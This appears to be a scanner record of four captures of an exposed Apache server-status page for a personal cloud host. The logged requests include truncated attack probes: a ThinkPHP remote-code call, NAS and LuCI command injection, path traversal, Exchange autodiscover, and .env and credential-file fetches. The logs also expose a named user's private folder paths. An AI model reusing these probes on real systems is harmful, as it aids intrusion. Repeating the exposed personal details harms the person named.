0.0012523511256692990.00.0079.89 185.180.143.138http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-168-0/0/3923. 0.00125235119571510.00.0063.81 185.191.126.213http/1.1localhost:80GET / HTTP/1.1 1-168-0/0/4060. 0.00125235106745070.00.0085.04 167.94.146.49http/1.1 1-168-0/0/3987. 0.001252351907002630.00.0090.56 167.94.146.49http/1.1ravignon.mycloud.paris:443GE
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31933c4805933c4805a33cd64e
Apache Status Apache Server Status for ravignon.mycloud.paris (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-10-26T13:44:44 Current Time: Sunday, 12-May-2024 23:50:59 UTC Restart Time: Friday, 24-Nov-2023 06:59:39 UTC Parent Server Config. Generation: 173 Parent Server MPM Generation: 172 Server uptime: 170 days 16 hours 51 minutes 19 seconds Server load: 0.08 0.02 0.01 Total accesses: 277801 - Total Traffic: 5.2 GB - Total Duration: 49229064 CPU Usage: u502.88 s978.72 cu2042.87 cs651.89 - .0283% CPU load .0188 requests/sec - 380 B/second - 19.7 kB/request - 177.21 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 21983381no0yes124000 31983382no0yes025000 Sum200 149000 .................................................._____W________ ____________________________________............................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-168-0/0/2992. 0.00345057605178400.00.0062.45 44.220.185.206http/1.1 0-168-0/0/2992. 0.0034505714952090.00.0041.15 44.220.185.206http/1.1 0-168-0/0/3068. 0.00345057665300900.00.0055.49 44.220.185.206http/1.1 0-168-0/0/3023. 0.0034505715301070.00.0064.96 44.220.185.206http/1.1 0-168-0/0/3010. 0.0034505715268590.00.0075.72 44.220.185.206http/1.1 0-168-0/0/3123. 0.00345057565402290.00.0072.24 44.220.185.206http/1.1 0-168-0/0/3073. 0.00345057555347750.00.0034.73 44.220.185.206http/1.1 0-168-0/0/3064. 0.00345057165221130.00.0071.85 44.220.185.206http/1.1 0-168-0/0/3004. 0.0034505705235930.00.0053.40 44.220.185.206http/1.1 0-168-0/0/3073. 0.0034505705502980.00.0071.68 44.220.185.206http/1.1 0-168-0/0/3034. 0.003450571215310680.00.0045.40 44.220.185.206http/1.1 0-168-0/0/3003. 0.0034505715262180.00.0046.23 51.15.60.133http/1.1 0-168-0/0/3063. 0.0034505705600450.00.0053.26 117.204.207.53http/1.1 0-168-0/0/3020. 0.0034505705421450.00.0050.16 87.121.69.52http/1.1localhost:80CONNECT google.com:443 HTTP/1.1 0-168-0/0/3034. 0.0034505705403130.00.0029.09 87.121.69.52http/1.1 0-168-0/0/3121. 0.0034505755540210.00.0054.46 54.36.115.221http/1.1localhost:80POST / HTTP/1.1 0-168-0/0/3025. 0.0034505775403620.00.0065.15 54.36.115.221http/1.1 0-168-0/0/3004. 0.003450571775279920.00.0077.10 64.227.42.11h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-168-0/0/2972. 0.00345057615168950.00.0054.14 64.227.42.11http/1.1 0-168-0/0/2960. 0.0034505705232720.00.0050.29 64.227.42.11h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-168-0/0/3031. 0.00345057565186620.00.0042.32 44.220.185.206http/1.1 0-168-0/0/2990. 0.003450571135250310.00.0034.25 44.220.185.206http/1.1 0-168-0/0/2961. 0.0034505705134080.00.0046.64 44.220.185.206http/1.1 0-168-0/0/3001. 0.0034505705090000.00.0047.23 44.220.185.206http/1.1 0-168-0/0/3057. 0.003450571185386230.00.0080.49 44.220.185.206http/1.1 1-168-0/0/4029. 0.0034505706956830.00.0062.53 54.36.115.221http/1.1 1-168-0/0/4041. 0.0034505707115740.00.0082.99 183.81.169.139http/1.1localhost:80GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&co 1-168-0/0/4033. 0.003450571266412390.00.0059.74 64.227.42.11http/1.1 1-168-0/0/4132. 0.003450571366995710.00.0042.25 167.94.146.49http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-168-0/0/4058. 0.003450571177016850.00.0065.35 44.220.185.206http/1.1 1-168-0/0/4031. 0.0034505707068650.00.0074.72 64.227.42.11http/1.1 1-168-0/0/4058. 0.0034505706852480.00.0047.21 54.36.115.221http/1.1localhost:80GET /.env HTTP/1.1 1-168-0/0/4120. 0.0034505737054110.00.00111.35 185.224.128.43http/1.1localhost:80GET / HTTP/1.1 1-168-0/0/4086. 0.0034505716779510.00.0067.43 167.94.146.49http/1.1 1-168-0/0/4058. 0.003450572477044240.00.0040.04 167.94.146.49http/1.1 1-168-0/0/4026. 0.0034505706459250.00.0081.32 54.36.115.221http/1.1localhost:80GET /.env HTTP/1.1 1-168-0/0/3976. 0.0034505737016230.00.0081.87 54.36.115.221http/1.1localhost:80POST / HTTP/1.1 1-168-0/0/4106. 0.0034505707017150.00.0075.51 103.92.155.19http/1.1 1-168-0/0/3999. 0.0034505706709420.00.0057.88 78.153.140.177http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 1-168-0/0/4029. 0.003450572026820250.00.0053.85 78.153.140.177http/1.1ravignon.mycloud.paris:443GET /.env HTTP/1.1 1-168-0/0/3970. 0.0034505716735910.00.0078.22 54.36.115.221http/1.1 1-168-0/0/4034. 0.0034505706837010.00.0074.60 64.227.42.11h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-168-0/0/3941. 0.003450571096465570.00.0069.40 94.156.8.73http/1.1ravignon.mycloud.paris:443POST /portal HTTP/1.1 1-168-0/0/3990. 0.003450571256692990.00.0079.89 185.180.143.138http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-168-0/0/3923. 0.0034505719571510.00.0063.81 185.191.126.213http/1.1localhost:80GET / HTTP/1.1 1-168-0/0/4060. 0.0034505706745070.00.0085.04 167.94.146.49http/1.1 1-168-0/0/3987. 0.00345057907002630.00.0090.56 167.94.146.49http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-168-0/0/4048. 0.003450571066909980.00.0082.53 167.94.146.49h2ravignon.mycloud.paris:443[0/0] init 1-168-0/0/3979. 0.0034505717105770.00.0043.92 167.94.146.49h2ravignon.mycloud.paris:443[0/0] done 1-168-0/0/4046. 0.0034505716844030.00.0067.69 167.94.146.49http/1.1 2-17219833810/3/1177_ 0.81511302021420.00.0510.99 45.128.232.107http/1.1localhost:80GET //cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&sy 2-17219833810/2/1185_ 0.58511332121100.00.0120.59 164.52.25.203h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 2-17219833810/5/1218_ 0.82356632290640.00.0420.47 154.212.141.233http/1.1ravignon.mycloud.paris:443GET /dist/core-files_client.js?v=ccbf35ac-1 HTTP/1.1 2-17219833810/0/1189_ 0.00356511994290.00.0032.09 167.94.138.117h2clocalhost:80[0/0] init 2-17219833810/4/1227_
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31933c4805933c4805373c62c9
Apache Status Apache Server Status for ravignon.mycloud.paris (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-10-26T13:44:44 Current Time: Sunday, 28-Apr-2024 22:45:53 UTC Restart Time: Friday, 24-Nov-2023 06:59:39 UTC Parent Server Config. Generation: 159 Parent Server MPM Generation: 158 Server uptime: 156 days 15 hours 46 minutes 13 seconds Server load: 0.17 0.05 0.01 Total accesses: 262179 - Total Traffic: 4.8 GB - Total Duration: 46752257 CPU Usage: u469.58 s903.62 cu1927.26 cs614 - .0289% CPU load .0194 requests/sec - 383 B/second - 19.4 kB/request - 178.322 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01923804no0yes124000 11923805no0yes025000 Sum200 149000 _____________W____________________________________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-15819238040/46/2789_ 7.30004728970.00.3155.33 92.118.39.120http/1.1localhost:80GET /public/index.php?s=/index/\\think\\app/invokefunction&functi 0-15819238040/30/2768_ 7.390624671890.00.2439.47 139.162.210.205http/1.1ravignon.mycloud.paris:443GET /about HTTP/1.1 0-15819238040/32/2858_ 7.251505002330.00.2547.86 139.162.210.205h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-15819238040/30/2815_ 7.291604935850.00.2031.71 139.162.210.205http/1.1 0-15819238040/31/2794_ 7.19014879720.00.2463.75 104.245.126.72http/1.1ravignon.mycloud.paris:443GET /dist/core-files_client.js?v=ccbf35ac-1 HTTP/1.1 0-15819238040/37/2895_ 7.19005055250.00.2464.86 92.118.39.120http/1.1 0-15819238040/41/2839_ 7.270864858230.00.3832.24 36.99.136.128http/1.1ravignon.mycloud.paris:443GET /dist/core-main.js?v=ccbf35ac-1 HTTP/1.1 0-15819238040/37/2856_ 7.33161154905640.00.3165.21 139.162.210.205http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-15819238040/38/2793_ 7.390624884850.00.2246.36 139.162.210.205http/1.1ravignon.mycloud.paris:443GET /.vscode/sftp.json HTTP/1.1 0-15819238040/39/2856_ 7.31015135680.00.2968.06 87.121.69.52http/1.1localhost:80CONNECT google.com:443 HTTP/1.1 0-15819238040/33/2806_ 7.400634876000.00.2840.81 139.162.210.205http/1.1ravignon.mycloud.paris:443GET /v2/_catalog HTTP/1.1 0-15819238040/29/2793_ 7.251514935870.00.2144.43 139.162.210.205http/1.1 0-15819238040/28/2838_ 7.2216825218960.00.2147.74 139.162.210.205h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-15819238041/36/2814W 7.22005122500.00.3845.74 139.162.210.205http/1.1ravignon.mycloud.paris:443GET /server-status HTTP/1.1 0-15819238040/33/2823_ 7.400704994500.00.2324.21 139.162.210.205http/1.1ravignon.mycloud.paris:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-15819238040/37/2917_ 6.6016545242970.00.2750.94 139.162.210.205http/1.1 0-15819238040/37/2824_ 7.281625070990.00.3562.84 36.99.136.129http/1.1ravignon.mycloud.paris:443GET /index.php/apps/theming/favicon?v=1 HTTP/1.1 0-15819238040/35/2780_ 7.291524915120.01.7575.38 139.162.210.205http/1.1 0-15819238040/29/2793_ 7.22161184842560.00.2152.64 139.162.210.205h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-15819238040/38/2742_ 7.281614905460.00.2848.70 139.162.210.205http/1.1 0-15819238040/39/2807_ 7.251504852660.00.2638.60 139.162.210.205h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-15819238040/33/2775_ 7.281604906030.00.4132.16 139.162.210.205h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-15819238040/35/2757_ 7.30024808580.00.2145.24 92.118.39.120http/1.1localhost:80GET /index.php?lang=../../../../../../../../var/tmp/index1 HTTP 0-15819238040/30/2787_ 7.390794743610.00.3137.66 139.162.210.205http/1.1ravignon.mycloud.paris:443GET /debug/default/view?panel=config HTTP/1.1 0-15819238040/37/2852_ 7.3801775033080.00.2878.14 139.162.210.205http/1.1ravignon.mycloud.paris:443GET /server HTTP/1.1 1-15819238050/17/3703_ 3.784838226407090.00.1356.96 111.7.96.181http/1.1ravignon.mycloud.paris:443GET /dist/core-main.js?v=ccbf35ac-1 HTTP/1.1 1-15819238050/19/3724_ 3.88483816575000.00.1479.07 111.7.96.181http/1.1ravignon.mycloud.paris:443GET /dist/core-files_fileinfo.js?v=ccbf35ac-1 HTTP/1.1 1-15819238050/18/3714_ 3.834812785851540.00.1353.42 20.19.37.125http/1.1ravignon.mycloud.paris:443GET /settings.py HTTP/1.1 1-15819238050/18/3808_ 4.58481212666478590.03.0439.35 104.245.126.72http/1.1ravignon.mycloud.paris:443GET /dist/core-common.js?v=ccbf35ac-1 HTTP/1.1 1-15819238050/15/3727_ 3.9048382496469360.00.1760.67 111.7.96.181http/1.1ravignon.mycloud.paris:443GET /dist/core-main.js?v=ccbf35ac-1 HTTP/1.1 1-15819238050/17/3695_ 3.8048201486441430.00.1272.18 36.99.136.136http/1.1 1-15819238050/16/3720_ 3.5348371606280500.00.1143.49 89.95.112.211http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 1-15819238050/17/3788_ 3.914819736503010.00.14102.25 123.160.221.133http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-15819238050/16/3752_ 3.73481206199790.00.1064.16 103.245.236.120http/1.1localhost:80GET /cgi-bin/orospucoc.cgi?user=messagebus&passwd=&cmd=15&syste 1-15819238050/17/3741_ 4.20481206608890.00.1337.28 104.245.126.72http/1.1ravignon.mycloud.paris:443GET /core/js/backgroundjobs.js?v=ccbf35ac-1 HTTP/1.1 1-15819238050/19/3703_ 3.84478815944370.00.1270.19 20.19.37.125http/1.1ravignon.mycloud.paris:443GET /u.php HTTP/1.1 1-15819238050/26/3673_ 3.6348191056432740.00.1464.11 182.138.158.15http/1.1 1-15819238050/19/3778_ 4.644789776508920.00.1471.71 36.99.136.129http/1.1ravignon.mycloud.paris:443GET /index.php/js/core/merged-template-prepend.js?v=ccbf35ac-1 1-15819238050/16/3679_ 5.17478720846174110.03.0349.20 36.99.136.129http/1.1ravignon.mycloud.paris:443GET /dist/core-common.js?v=ccbf35ac-1 HTTP/1.1 1-15819238050/22/3719_ 3.84478816231570.00.1548.49 20.19.37.125http/1.1ravignon.mycloud.paris:443GET /q.php HTTP/1.1 1-15819238050/17/3652_ 4.64478916236720.00.1073.41 36.99.136.129http/1.1ravignon.mycloud.paris:443GET /apps/files_rightclick/js/script.js?v=ccbf35ac-1 HTTP/1.1 1-15819238050/17/3710_ 3.84478716370790.00.1065.72 20.19.37.125http/1.1ravignon.mycloud.paris:443GET /testing.php HTTP/1.1 1-15819238050/20/3621_ 3.7627271435910150.00.1152.23 20.19.37.125http/1.1 1-15819238050/19/3681_ 5.17272706200820.00.1269.68 203.55.81.13http/1.1localhost:80GET /api/.env HTTP/1.1 1-15819238050/18/3605_ 3.6911419100140.00.1155.61 89.95.112.211http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 1-15819238050/16/3722_ 3.502727976195440.00.1178.29 185.170.144.3http/1.1 1-15819238050/16/3660_ 5.17272706452530.00.0882.47 203.55.81.13http/1.1localhost:80GET /.env HTTP/1.1 1-15819238050/16/3738_ 3.776663636412210.00.1269.84 188.166.108.93http/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31933c4805933c4805a8c167fa
Apache Status Apache Server Status for ravignon.mycloud.paris (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-10-26T13:44:44 Current Time: Thursday, 18-Apr-2024 22:48:17 UTC Restart Time: Friday, 24-Nov-2023 06:59:39 UTC Parent Server Config. Generation: 149 Parent Server MPM Generation: 148 Server uptime: 146 days 15 hours 48 minutes 38 seconds Server load: 0.00 0.00 0.00 Total accesses: 243996 - Total Traffic: 4.6 GB - Total Duration: 44466105 CPU Usage: u447.65 s852.58 cu1822.07 cs576.99 - .0292% CPU load .0193 requests/sec - 393 B/second - 20.0 kB/request - 182.241 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01882010no0yes124000 11882011no0yes025000 Sum200 149000 _______W__________________________________________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-14818820100/41/2412_ 8.580724277070.00.2451.88 159.203.96.42http/1.1ravignon.mycloud.paris:443GET /v2/_catalog HTTP/1.1 0-14818820100/33/2368_ 8.5201484278530.00.2136.17 83.97.73.245http/1.1ravignon.mycloud.paris:443GET /actuator/gateway/routes HTTP/1.1 0-14818820100/48/2450_ 8.5001774552820.00.7742.92 185.180.143.190http/1.1ravignon.mycloud.paris:443GET /cf_scripts/scripts/ajax/ckeditor/ckeditor.js HTTP/1.1 0-14818820100/48/2436_ 8.3602004533180.00.2728.50 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/DOSSIERS%20B 0-14818820100/44/2413_ 8.580704520140.00.2757.55 159.203.96.42http/1.1ravignon.mycloud.paris:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-14818820100/35/2495_ 8.571854614440.00.1756.25 159.203.96.42http/1.1ravignon.mycloud.paris:443GET /about HTTP/1.1 0-14818820100/48/2438_ 8.3429282354375620.00.2628.66 185.117.37.101http/1.1ravignon.mycloud.paris:443DELETE /remote.php/dav/files/Beatrice%20Ravignon/DOSSIERS%20BR/ 0-14818820101/53/2463W 8.29004455810.04.6957.58 159.203.96.42http/1.1ravignon.mycloud.paris:443GET /server-status HTTP/1.1 0-14818820100/41/2387_ 8.5674504438870.00.2443.08 87.121.69.52http/1.1localhost:80CONNECT google.com:443 HTTP/1.1 0-14818820100/52/2454_ 8.570624647220.04.9860.38 159.203.96.42http/1.1ravignon.mycloud.paris:443GET /debug/default/view?panel=config HTTP/1.1 0-14818820100/43/2419_ 8.257453194468580.00.2537.65 87.121.69.52http/1.1 0-14818820100/36/2395_ 8.2611474402980.00.2141.29 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/DOSSIERS%20B 0-14818820100/45/2440_ 8.0556171344702630.00.2643.79 195.144.21.56http/1.1 0-14818820100/47/2426_ 8.2977991514645490.00.2841.71 192.241.200.70http/1.1 0-14818820100/53/2419_ 8.1443911664483220.00.2620.76 80.66.83.48http/1.1 0-14818820100/44/2504_ 8.54469004758290.00.2447.67 46.174.191.29http/1.1localhost:80GET / HTTP/1.0 0-14818820100/48/2418_ 8.56292804611980.00.2857.80 168.76.20.229http/1.1localhost:80GET /robots.txt HTTP/1.1 0-14818820100/35/2405_ 8.56293124418380.00.2070.84 168.76.20.229http/1.1localhost:80GET / HTTP/1.1 0-14818820100/64/2398_ 8.47214395290.00.3444.84 159.203.96.42http/1.1 0-14818820100/42/2345_ 8.3329293464479510.00.2944.23 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/DOSSIERS%20B 0-14818820100/40/2422_ 8.5530941234448840.00.2235.17 192.241.239.40http/1.1ravignon.mycloud.paris:443GET /autodiscover/autodiscover.json?@zdi/Powershell HTTP/1.1 0-14818820100/41/2396_ 8.234331844449340.00.2528.73 80.66.83.48http/1.1 0-14818820100/42/2364_ 8.4046791764388840.00.2541.89 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 0-14818820100/41/2404_ 8.5456181224294270.00.2234.49 49.235.121.42http/1.1ravignon.mycloud.paris:443GET /+CSCOE+/logon.html HTTP/1.1 0-14818820100/50/2447_ 8.3330943514637400.00.2874.98 80.75.212.75http/1.1 1-14818820110/63/3354_ 11.27305943680.00.3854.88 159.203.96.42h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-14818820110/61/3387_ 11.2831146118190.00.3676.16 159.203.96.42http/1.1 1-14818820110/64/3361_ 11.1631295437620.00.3751.29 159.203.96.42h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-14818820110/61/3465_ 11.27415968830.00.3934.37 159.203.96.42h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-14818820110/60/3395_ 11.1921795978470.01.2958.55 159.203.96.42http/1.1 1-14818820110/62/3347_ 11.2011255997030.00.3767.06 168.76.20.229http/1.1 1-14818820110/60/3399_ 11.1731485882840.00.3541.48 159.203.96.42http/1.1 1-14818820110/67/3437_ 11.1721285998160.00.3897.45 159.203.96.42h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-14818820110/53/3429_ 11.1921535718770.00.2952.33 57.129.23.166http/1.1 1-14818820110/62/3412_ 10.8131266150820.00.3635.31 159.203.96.42http/1.1 1-14818820110/57/3347_ 11.29205426400.00.5768.21 159.203.96.42h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-14818820110/66/3353_ 11.2111365963890.00.6762.49 128.199.182.152http/1.1ravignon.mycloud.paris:443GET /?rest_route=/wp/v2/users/ HTTP/1.1 1-14818820110/60/3446_ 11.3179116001180.00.3569.48 43.155.138.79http/1.1localhost:80GET / HTTP/1.1 1-14818820110/68/3337_ 11.381645668730.00.6444.24 159.203.96.42http/1.1ravignon.mycloud.paris:443GET /.vscode/sftp.json HTTP/1.1 1-14818820110/68/3389_ 11.371705809620.00.4344.46 159.203.96.42http/1.1ravignon.mycloud.paris:443GET /server HTTP/1.1 1-14818820110/55/3320_ 11.372835735250.00.3470.66 159.203.96.42http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-14818820110/44/3391_ 11.2587915933100.00.2760.45 57.129.23.166http/1.1localhost:80GET /.env HTTP/1.1 1-14818820110/59/3286_ 11.3212725453840.00.3549.83 57.129.23.166http/1.1localhost:80POST / HTTP/1.1 1-14818820110/67/3354_ 11.3012195756740.00.4158.14 198.235.24.234http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-14818820110/61/3291_ 10.711271218658380.00.3553.87 57.129.23.166http/1.1 1-14818820110/67/3397_ 11.1541325754360.00.4176.49 168.194.177.42http/1.1 1-14818820110/56/3326_ 11.2578725970790.00.3180.61 57.129.23.166http/1.1localhost:80POST / HTTP/1.1 1-14818820110/68/3404_ 11.3212705934660.00.4168.02 57.129.23.166http/1.1localhost:80GET /.env HTTP/1.1 1-14818820110/49/3342_ 11.1512776207470.00.2838.15 57.129.23.166http/1.1 1-14818820110/63/3405_ 11.3341105875090.00.3363.03 159.203.96.42http/1.1ravignon.
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31933c4805933c48057d9ece54
Apache Status Apache Server Status for ravignon.mycloud.paris (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-10-26T13:44:44 Current Time: Wednesday, 10-Apr-2024 15:15:25 UTC Restart Time: Friday, 24-Nov-2023 06:59:39 UTC Parent Server Config. Generation: 141 Parent Server MPM Generation: 140 Server uptime: 138 days 8 hours 15 minutes 45 seconds Server load: 0.05 0.07 0.02 Total accesses: 225294 - Total Traffic: 4.3 GB - Total Duration: 41199046 CPU Usage: u426.51 s807.05 cu1693.19 cs534.03 - .029% CPU load .0188 requests/sec - 387 B/second - 20.1 kB/request - 182.868 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01848603no0yes025000 11848604no0yes124000 Sum200 149000 _________________________________________W________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-14018486030/39/2097_ 8.6954693754660.00.2633.07 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 0-14018486030/38/2055_ 8.68114773782580.00.2334.08 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 0-14018486030/38/2139_ 8.691131734004470.00.2340.06 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-14018486030/39/2108_ 8.45228783996900.00.2326.39 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-14018486030/42/2121_ 8.542281634000770.00.2547.34 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 0-14018486030/41/2159_ 8.561682524050100.00.2754.09 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-14018486030/40/2107_ 8.081081363781700.00.2426.46 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 0-14018486030/34/2128_ 8.481681623862920.00.2046.19 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 0-14018486030/36/2069_ 8.6953953858080.00.1940.45 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-14018486030/38/2123_ 8.50481094045620.00.2753.51 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 0-14018486030/46/2100_ 8.624731383931600.00.2631.34 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-14018486030/37/2117_ 8.671731463865250.00.2639.60 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 0-14018486030/44/2103_ 8.652931724100100.00.2636.80 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-14018486030/40/2098_ 8.10498664036650.00.2339.56 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-14018486030/34/2109_ 8.10101403844470.00.2115.08 64.226.78.121http/1.1 0-14018486030/43/2154_ 8.61481084087830.00.2845.53 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-14018486030/50/2069_ 8.491081033974990.00.2946.57 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-14018486030/30/2105_ 8.624731553698510.00.2030.86 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 0-14018486030/41/2070_ 8.414681373870160.00.2833.15 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-14018486030/36/2023_ 8.132881723926780.00.8142.07 208.100.26.243http/1.1 0-14018486030/33/2101_ 8.662331773811940.00.2032.99 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 0-14018486030/34/2077_ 8.642941263928850.00.2226.31 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 0-14018486030/40/2053_ 8.534682103859330.00.2335.66 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-14018486030/40/2083_ 8.681731633687900.00.2731.79 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-14018486030/39/2114_ 8.452881534069140.00.2764.35 208.100.26.243http/1.1 1-14018486040/57/2940_ 12.6901505141930.00.3851.70 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-14018486040/54/2940_ 12.66111215416540.00.5072.37 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-14018486040/53/2921_ 12.3912484747170.00.3343.60 208.100.26.243http/1.1 1-14018486040/56/3032_ 13.0011195190890.00.3831.34 64.226.78.121http/1.1ravignon.mycloud.paris:443GET /server HTTP/1.1 1-14018486040/64/2961_ 12.700695312100.04.1054.20 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 1-14018486040/44/2930_ 12.8612435283630.00.2754.80 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-14018486040/56/2961_ 13.010775120820.00.3638.03 64.226.78.121http/1.1ravignon.mycloud.paris:443GET /about HTTP/1.1 1-14018486040/58/2993_ 13.0111605120800.01.0364.14 64.226.78.121http/1.1ravignon.mycloud.paris:443GET /.vscode/sftp.json HTTP/1.1 1-14018486040/53/3013_ 12.310954993850.00.3349.47 77.238.255.224http/1.1 1-14018486040/66/2983_ 12.7909615314990.00.3932.59 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND 